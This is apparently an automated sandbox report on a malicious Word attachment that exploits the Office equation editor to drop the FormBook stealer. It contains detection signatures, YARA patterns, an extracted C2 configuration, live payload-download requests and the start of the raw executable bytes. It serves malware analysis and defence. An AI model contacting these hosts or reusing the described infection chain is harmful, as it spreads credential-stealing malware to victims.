# Analysis Report Swift_Payment.MT103.docx

## Overview

### General Information

 Sample Name: Swift_Payment.MT103.docx Analysis ID: 433305 MD5: b222a3ced51fbd79d5fb84bbca12e509 SHA1: bc2f5c72b5e3ddd58e991d83c94cb071152a2671 SHA256: 3332ad1461dc79f815e43bf55a6e105bddef5324468b041a97457de7dfcaf2b4 Infos: Most interesting Screenshot:

### Detection

FormBook
 Score: 100 Range: 0 - 100 Whitelisted: false Confidence: 100%

### Signatures

Antivirus detection for dropped file
Contains an external reference to another document
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

### Classification

 System is w7x64WINWORD.EXE (PID: 2512 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)EQNEDT32.EXE (PID: 2888 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)vbc.exe (PID: 2296 cmdline: 'C:\Users\Public\vbc.exe' MD5: 616A10FDC3307FD483916E1B578C9F9C)vbc.exe (PID: 3040 cmdline: C:\Users\Public\vbc.exe MD5: 616A10FDC3307FD483916E1B578C9F9C)explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)NAPSTAT.EXE (PID: 2244 cmdline: C:\Windows\SysWOW64\NAPSTAT.EXE MD5: 4AF92E1821D96E4178732FC04D8FD69C)cmd.exe (PID: 2236 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)cleanup
``{"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", "freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}``
SourceRuleDescriptionAuthorStrings
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b62:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15685:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15171:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15787:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ff:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa57a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143ec:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb273:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b327:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c32a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18409:\$sqlite3step: 68 34 1C 7B E1
• 0x1851c:\$sqlite3step: 68 34 1C 7B E1
• 0x18438:\$sqlite3text: 68 38 2A 90 C5
• 0x1855d:\$sqlite3text: 68 38 2A 90 C5
• 0x1844b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18573:\$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2185034993.0000000002256000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
SourceRuleDescriptionAuthorStrings
6.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
6.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x98e8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x9b62:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x15685:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x15171:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x15787:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x158ff:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0xa57a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x143ec:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xb273:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1b327:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1c32a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
6.2.vbc.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
• 0x18409:\$sqlite3step: 68 34 1C 7B E1
• 0x1851c:\$sqlite3step: 68 34 1C 7B E1
• 0x18438:\$sqlite3text: 68 38 2A 90 C5
• 0x1855d:\$sqlite3text: 68 38 2A 90 C5
• 0x1844b:\$sqlite3blob: 68 53 D8 7F 8C
• 0x18573:\$sqlite3blob: 68 53 D8 7F 8C
6.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
6.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
• 0x8ae8:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x8d62:\$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
• 0x14885:\$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
• 0x14371:\$sequence_2: 3B 4F 14 73 95 85 C9 74 91
• 0x14987:\$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
• 0x14aff:\$sequence_4: 5D C3 8D 50 7C 80 FA 07
• 0x977a:\$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
• 0x135ec:\$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
• 0xa473:\$sequence_7: 66 89 0C 02 5B 8B E5 5D
• 0x1a527:\$sequence_8: 3C 54 74 04 3C 74 75 F4
• 0x1b52a:\$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
## Sigma Overview

### Exploits:

 Sigma detected: File Dropped By EQNEDT32EXE Show sources
 Source: File created Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2888, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe

### System Summary:

 Sigma detected: Droppers Exploiting CVE-2017-11882 Show sources
 Source: Process started Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2888, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2296
 Sigma detected: Execution from Suspicious Folder Show sources
 Source: Process started Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2888, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2296

## Signature Overview

### AV Detection:

 Antivirus detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\o[1].doc Avira: detection malicious, Label: HEUR/Rtf.Malformed Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27720357.doc Avira: detection malicious, Label: HEUR/Rtf.Malformed
 Found malware configuration Show sources
 Source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.rocketschool.net/nf2/"], "decoy": ["avlholisticdentalcare.com", "coolermassmedia.com", "anythingneverything.net", "maimaixiu.club", "veyconcorp.com", "rplelectro.com", "koch-mannes.club", "tecknetpro.com", "getresurface.net", "mertzengin.com", "nbppfanzgn.com", "508hill.com", "ourdailydelights.com", "aimeesambayan.com", "productstoredt.com", "doublelblonghorns.com", "lucidcurriculum.com", "thegoddessnow.com", "qywqmjku.icu", "yonibymina.com", "fair-employer.institute", "loundxgroup.com", "grandcanyonbean.com", "gmailanalytics.tools", "e-deers.tech", "gxbokee.com", "saimeisteel.com", "walnutcreekresidences.com", "catalinaislandlodging.com", "financassexy.com", "wtuydga.icu", "agrestorationil.com", "guidenconsultants.com", "annazon-pc.xyz", "trinamorris.com", "dealwiththeboss.com", "touchedbyastar.com", "myenduringlegacy.com", "livegirlroom.com", "managainstthegrain.com", "wikige.com", "muyiyang233.com", "dopegraphicz.com", "varietyarena.com", "henohenomohej.com", "wx323.com", "k1ck1td0wn.com", "fundsvalley.com", "ebike-ny.com", "xn--yedekparaclar-pgb62i.com", "vidssea.com", "wifiultraboostavis.com", "exploitconstruction.com", "freddeveld.com", "kslux.com", "couplealamo.icu", "touchwood-card.com", "k8vina51.com", "thrivwnt.com", "earlybirdwormfarm.com", "hayyaabaya.com", "holidayhomeinfrance.com", "ssalmeria.com", "nivxros.com"]}
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vbc[1].exe ReversingLabs: Detection: 26% Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 26%
 Multi AV Scanner detection for submitted file Show sources
 Source: Swift_Payment.MT103.docx Virustotal: Detection: 8% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000008.00000002.2443394630.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000007.00000000.2215103438.000000000293F000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.2443316419.0000000000230000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2185257430.0000000003239000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000008.00000002.2442286951.0000000000080000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.2224718389.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000000.2183018548.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.2224969781.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000006.00000002.2224913904.00000000002F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.2185374644.000000000333A000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 6.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 6.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 6.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE Source: Yara match File source: 6.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 6.2.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 6.0.vbc.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

### Exploits:

 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) Show sources
 Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
 Office Equation Editor has been started Show sources
 Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
 Uses new MSVCR Dlls Show sources
 Binary contains paths to debug symbols Show sources
 Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE Source: Binary string: napstat.pdb source: vbc.exe, 00000006.00000002.2224936502.0000000000370000.00000040.00000001.sdmp Source: Binary string: SByteTypeInfo.pdb source: vbc.exe, vbc.exe.3.dr
 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_0431A0D0 Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 5_2_04319F50 Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 6_2_00416CA0 Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop edi 8_2_00096CA0
 Potential document exploit detected (performs DNS queries) Show sources
 Source: global traffic DNS query: name: xy2.eu
 Potential document exploit detected (performs HTTP gets) Show sources
 Source: global traffic TCP traffic: 192.168.2.22:49172 -> 93.157.97.6:80
 Potential document exploit detected (unknown TCP traffic) Show sources
 Source: global traffic TCP traffic: 192.168.2.22:49167 -> 93.157.97.6:80

### Networking:

 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) Show sources
 Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 93.157.97.6:80 Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49171 -> 93.157.97.6:80 Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49175 -> 93.157.97.6:80 Source: Traffic Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49176 -> 93.157.97.6:80
 C2 URLs / IPs found in malware configuration Show sources
 Source: Malware configuration extractor URLs: www.rocketschool.net/nf2/
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 13:59:27 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7Last-Modified: Fri, 11 Jun 2021 00:12:45 GMTETag: "e5400-5c4725dfdba60"Accept-Ranges: bytesContent-Length: 939008Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1b aa c2 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 a8 0b 00 00 a8 02 00 00 00 00 00 fe c5 0b 00 00 20 00 00 00 e0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0e 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 c5 0b 00 4b 00 00 00 00 00 0c 00 88 a3 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0e 00 0c 00 00 00 5f c5 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 a6 0b 00 00 20 00 00 00 a8 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 e0 0b 00 00 02 00 00 00 ac 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 a3 02 00 00 00 0c 00 00 a4 02 00 00 ae 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0e 00 00 02 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 93.157.97.6 93.157.97.6
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: DIGICABLEHU DIGICABLEHU Source: Joe Sandbox View ASN Name: OGICOMPL OGICOMPL
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: GET /e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive Source: global traffic HTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive
 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164 Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.164
 Source: global traffic HTTP traffic detected: GET /e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /?redirect=e9yj HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: xy2.euConnection: Keep-Alive Source: global traffic HTTP traffic detected: GET /oti/o.dot HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 192.3.141.164Connection: Keep-Alive Source: global traffic HTTP traffic detected: GET /oti/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.164Connection: Keep-Alive Source: global traffic HTTP traffic detected: GET 